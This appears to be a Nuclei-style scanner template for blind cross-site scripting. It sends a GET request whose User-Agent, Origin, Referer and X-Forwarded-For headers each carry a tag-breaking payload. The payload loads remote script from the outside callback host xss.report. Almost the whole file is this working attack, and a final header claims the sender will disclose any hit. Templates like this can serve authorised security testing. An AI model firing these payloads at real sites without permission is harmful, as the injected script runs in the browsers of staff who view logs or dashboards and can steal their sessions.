id: BXSS

info:
  name: Blind XSS payloads via headers
  author: 25
  severity: high
  tags: xss, blind-xss, headers

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    headers:
      User-Agent: '''>"></title></style></textarea></script><script src=https://xss.report/c/babutesting></script>'
      Origin: '''>"></title></style></textarea></script><script src=https://xss.report/c/babutesting></script>'
      Referer: '''>"></title></style></textarea></script><script src=https://xss.report/c/babutesting></script>'
      X-Forwarded-For: '''>"></title></style></textarea></script><script src=https://xss.report/c/babutesting></script>'
      Test-header: "Testing for Blind XSS; if triggered, I will inform you."
